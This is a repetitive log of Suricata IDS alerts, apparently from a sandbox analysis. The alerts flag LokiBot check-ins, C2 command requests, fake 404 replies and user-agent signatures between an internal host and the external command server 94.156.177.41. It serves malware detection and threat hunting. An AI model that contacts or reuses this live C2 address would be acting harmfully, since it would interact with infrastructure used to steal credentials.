Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49898
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49733
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49930 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49880 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49918 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49918 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49918 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49918 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49971 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49971 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49971 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49909 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49791 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49839 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49829 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49918 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49829
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49918
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49971 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49966 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49948 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49966 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49844 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49966 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49909 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49948
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49710
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49930
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49971 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49982 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49966 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49880 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49880 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49844 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49844 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49982 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49903 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49903 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49880 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49971
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49844 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49844 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49966 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49874
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49844
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49903 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49966
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49880 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49982 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49976 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49839
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49909
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49903 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49982 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49943 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49791
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49982 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49820 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49976
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49880
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49716
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49903 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49943
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49928 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49903
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49935 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49982
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49849 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49820
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49854 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49849
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49854
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49823 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49914 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49935
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49914
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49885 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49823
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49922 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49987 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49808 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49885
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49987
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50000 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50009 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49750 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49958 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50000
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49922
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49962 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49962
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49808
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49995 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49864 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49995
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49864
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50004 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50004 -> 94.156.177.41:80
